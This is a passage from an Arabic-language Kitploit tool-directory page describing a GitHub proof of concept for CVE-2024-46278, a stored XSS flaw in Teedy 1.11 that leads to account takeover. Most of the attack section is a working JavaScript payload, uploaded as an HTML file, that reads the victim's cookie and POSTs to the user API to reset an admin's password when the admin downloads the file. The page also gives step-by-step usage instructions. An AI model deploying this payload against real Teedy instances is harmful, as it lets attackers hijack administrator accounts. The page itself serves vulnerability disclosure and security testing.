Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-46278-teedy_1.11_account-takeover — 【Teedy 1.11】الاستيلاء على الحساب عبر XSS | Kitploit
أدوات/GitHubGitHub/ayato-shitomi/cve-2024-46278-teedy_1.11_account-takeover
أدوات التصيدتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالهندسة الاجتماعية
GitHubayato-shitomi/cve-2024-46278-teedy_1.11_account-takeover

CVE-2024-46278-teedy_1.11_account-takeover

【Teedy 1.11】الاستيلاء على الحساب عبر XSS

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

【CVE-2024-46278】teedy_1.11_account-takeover

【Teedy 1.11】سرقة حساب عبر XSS

التفاصيل

توجد ثغرة أمنية تسبب XSS عند تنزيل الملفات. يمكن أن تسمح ثغرة XSS لمسؤول Teedy بسرقة حساب ببضع نقرات.

تم تصنيف هذه الثغرة كـ CVE-2024-46278: https://www.cve.org/CVERecord?id=CVE-2024-46278

إثبات المفهوم (PoC)

  • قم بتسجيل الدخول بحساب المهاجم.
  • ارفع هذا الملف كنوع html. يجب عليك تغيير "Origin" و"Referer" ووسيط fetch حسب الحاجة.
root@kitploit:~
<script>
const currentCookie = document.cookie;

const requestOptions = {
  method: 'POST',
  headers: {
    'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
    'Accept': 'application/json, text/plain, */*',
    'Cookie': currentCookie,
    'sec-ch-ua': '"Not_A Brand";v="8", "Chromium";v="120"',
    'sec-ch-ua-mobile': '?0',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36',
    'sec-ch-ua-platform': '"Linux"',
    'Origin': 'http://localhost:8080',
    'Sec-Fetch-Site': 'same-origin',
    'Sec-Fetch-Mode': 'cors',
    'Sec-Fetch-Dest': 'empty',
    'Referer': 'http://localhost:8080/',
    'Accept-Encoding': 'gzip, deflate, br',
    'Accept-Language': 'en-US,en;q=0.9'
  },
  body: 'password=superSecure2&passwordconfirm=superSecure2'
};

fetch('http://localhost:8080/api/user', requestOptions)
  .then(response => {
    if (!response.ok) {
      throw new Error('Network response was not ok');
    }
        document.write('<h1>Your account was taken over by the attacker LOL</h1>');
    return response.json();
  })
  .then(data => console.log(data))
  .catch(error => console.error('There was a problem with your fetch operation:', error));
</script>
  • قم بتسجيل الدخول بحساب آخر. مثال: admin
  • انقر على الملف الذي رفعه المهاجم واختر Download this file.

عرض توضيحي

https://www.youtube.com/watch?v=udQgVogsmhA

تنزيل الأداة